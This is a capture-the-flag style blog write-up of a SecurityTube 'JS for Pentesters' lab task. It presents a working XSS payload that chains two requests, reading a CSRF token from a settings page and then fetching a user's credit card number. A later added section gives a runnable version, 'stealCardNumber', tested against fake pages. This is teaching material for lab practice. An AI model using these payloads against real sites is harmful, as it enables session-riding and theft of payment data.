XSS - Multilevel HTML parsing: JS for Pentesters task 19 write up

Nov 3, 2014 • jsp, javascript, xss, security-tube

writeup for task-19 of the JS for pentesters series by security-tube - Multilevel HTML parsing

In the last challenge we saw how we can receive and parse an HTML page that comes back as the result of a successful XMLHttpRequest(). When we take it one level further, things become a bit more involved: the data we want is behind a second request whose parameters (here a user id and a CSRF token) have to be scraped from the first response. Let us now see how to do this multilevel HTML parsing to solve the challenge.

JS for Pentesters task 19

Our objective is to find John's credit card number using an XSS vulnerability on this page and display the credit card number in the div with id "result". The challenge itself is easy, but constructing the correct payload is a bit time-consuming. The working payload looks like this:

    <script>
        // Two requests are needed: the first fetches the settings page (which
        // carries the CSRF token), the second fetches the credit card page.
        var xhr = new XMLHttpRequest();
        var xhr2 = new XMLHttpRequest();
        var csrf_token = '';
        var uid = '';
        var credit = '';

        // Step 2 handler: runs once the credit card page has been fetched.
        xhr2.onreadystatechange = function() {
            if (xhr2.readyState == 4 && xhr2.status == 200) {
                // responseType = "document" makes responseXML a parsed HTML Document,
                // so normal DOM lookups work on it.
                var html = xhr2.responseXML;
                credit = html.getElementById("result").innerHTML;
                console.log(credit);
                // Write the stolen number into the "result" div of the main page.
                document.getElementById("result").innerHTML = credit;
            }
        }

        // Step 1 handler: runs once the settings page has been fetched.
        xhr.onreadystatechange = function() {
            if (xhr.readyState == 4 && xhr.status == 200) {
                var html2 = xhr.responseXML;
                // The CSRF token is the second input of the first form on the settings page.
                csrf_token = html2.forms[0].elements[1].value;
                alert(csrf_token); // debugging aid: confirm the token was read
                // Chain the second request, now that we have both parameters it needs.
                xhr2.open("GET", "/lab/webapp/jfp/19/getcreditcard?uid=" + uid + "&csrf_token=" + csrf_token, true);
                xhr2.responseType = "document";
                xhr2.send();
            }
        }

        // The settings link on the page holds the uid in its text ("...:<uid>") and
        // points at the settings page we need for the token.
        var link = document.getElementById("settings");
        uid = link.innerHTML.split(":")[1];
        xhr.open("GET", link.href, true);
        xhr.responseType = "document";
        xhr.send();
    </script>

What we are doing here is simple. Since we have to parse two HTML pages, we need two XMLHttpRequests. We fire the first request against the settings page; when it completes, its handler reads the CSRF token out of the parsed response (responseType "document" gives us a real DOM in responseXML) and fires the second request from inside the first handler, passing along the uid and the token. The second response contains the credit card number, which we copy into the "result" div of the main page. The getcreditcard endpoint is protected by a CSRF token, but because our injected script runs in the victim's origin with the victim's cookies, it can simply read the token off the page first; this is the standard way XSS renders CSRF protection moot.
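The same two-step chain written as an added example (not part of the original write-up or the lab code), in a form that can be exercised outside a browser. Instead of XMLHttpRequest callbacks it uses an injected `get(url)` function returning the response body as a string, and it scrapes the token and the card number out of raw HTML with regular expressions, so it also works when `responseXML` is unavailable and only `responseText` is. The URL paths, parameter names, input names and HTML snippets in `FAKE_PAGES` are constructed for illustration and only mirror the lab page in shape; in a real payload `get` would be something like `url => fetch(url, {credentials: 'include'}).then(r => r.text())`.

```javascript
// Added example, not the original payload. Everything below that names a URL,
// parameter or element id is an assumption modelled on the write-up.

// Escape a literal string for use inside a RegExp.
function escapeRe(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Return the value attribute of the <input> whose name attribute equals `name`,
// or null if no such input exists. Attribute order does not matter.
function extractInputValue(html, name) {
  const tagRe = /<input\b[^>]*>/gi;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    const nameMatch = /\bname\s*=\s*["']([^"']*)["']/i.exec(tag[0]);
    if (nameMatch && nameMatch[1] === name) {
      const valueMatch = /\bvalue\s*=\s*["']([^"']*)["']/i.exec(tag[0]);
      return valueMatch ? valueMatch[1] : '';
    }
  }
  return null;
}

// Return the trimmed inner HTML of the first element with the given id, or null.
function extractElementText(html, id) {
  const re = new RegExp(
    '<([a-z][a-z0-9]*)\\b[^>]*\\bid\\s*=\\s*["\']' + escapeRe(id) + '["\'][^>]*>([\\s\\S]*?)</\\1>',
    'i'
  );
  const m = re.exec(html);
  return m ? m[2].trim() : null;
}

// Mirrors the original payload's assumption that the settings link text ends in ":<uid>".
function parseUidFromLink(linkText) {
  const parts = linkText.split(':');
  return parts.length > 1 ? parts[1].trim() : null;
}

// Step 1: fetch the settings page and read the CSRF token.
// Step 2: request the credit card endpoint with uid + token and read #result.
async function stealCardNumber(get, settingsUrl, uid) {
  const settingsHtml = await get(settingsUrl);
  const csrfToken = extractInputValue(settingsHtml, 'csrf_token');
  if (csrfToken === null) throw new Error('csrf_token input not found on settings page');
  const cardUrl = '/lab/webapp/jfp/19/getcreditcard?uid=' + encodeURIComponent(uid) +
                  '&csrf_token=' + encodeURIComponent(csrfToken);
  const cardHtml = await get(cardUrl);
  const card = extractElementText(cardHtml, 'result');
  if (card === null) throw new Error('#result not found on credit card page');
  return { csrfToken: csrfToken, cardUrl: cardUrl, card: card };
}

// Constructed stand-in for the lab server: two pages keyed by URL.
const FAKE_PAGES = {
  '/lab/webapp/jfp/19/settings?uid=42':
    '<html><body><form method="POST" action="/lab/webapp/jfp/19/settings">' +
    '<input type="text" name="email" value="john@example.com">' +
    '<input type="hidden" name="csrf_token" value="abc123def456">' +
    '<input type="submit" value="Save"></form></body></html>',
  '/lab/webapp/jfp/19/getcreditcard?uid=42&csrf_token=abc123def456':
    '<html><body><div id="result">4111 1111 1111 1111</div></body></html>'
};

async function fakeGet(url) {
  if (!(url in FAKE_PAGES)) throw new Error('404 ' + url);
  return FAKE_PAGES[url];
}

// Run the whole chain against the fake server; used by the stand-alone demo below.
function demo() {
  const uid = parseUidFromLink('Settings for uid:42');
  return stealCardNumber(fakeGet, '/lab/webapp/jfp/19/settings?uid=' + uid, uid);
}

if (typeof require !== 'undefined' && require.main === module) {
  demo().then(r => console.log('card:', r.card)).catch(e => { console.error(e); process.exit(1); });
}
```

The point of splitting the scraping into `extractInputValue` and `extractElementText` is that both steps fail loudly (return `null`, then throw) when the page layout differs from what the payload expects, which is exactly the situation that makes a chained XSS payload "time-consuming to construct": each stage has to be verified against a real response before the next one can be written.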

Note:

1) While playing with XSS challenges, it is recommended to use Mozilla Firefox. Google Chrome ships an inbuilt XSS Auditor that blocks reflected script from executing even when the page is vulnerable to XSS, so payloads that work fine in Firefox may appear to fail in Chrome. We therefore strongly recommend Firefox over Chrome for these labs.

We hope that you liked this challenge. If there is anything you did not understand or want more clarity on, please comment below and we will be happy to help. Also, if you find a better way of solving the challenge, please share it with us; we are happy to learn from our readers too. Happy pentesting.

Anirudh Anand

Product Security ♥ | CTF - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE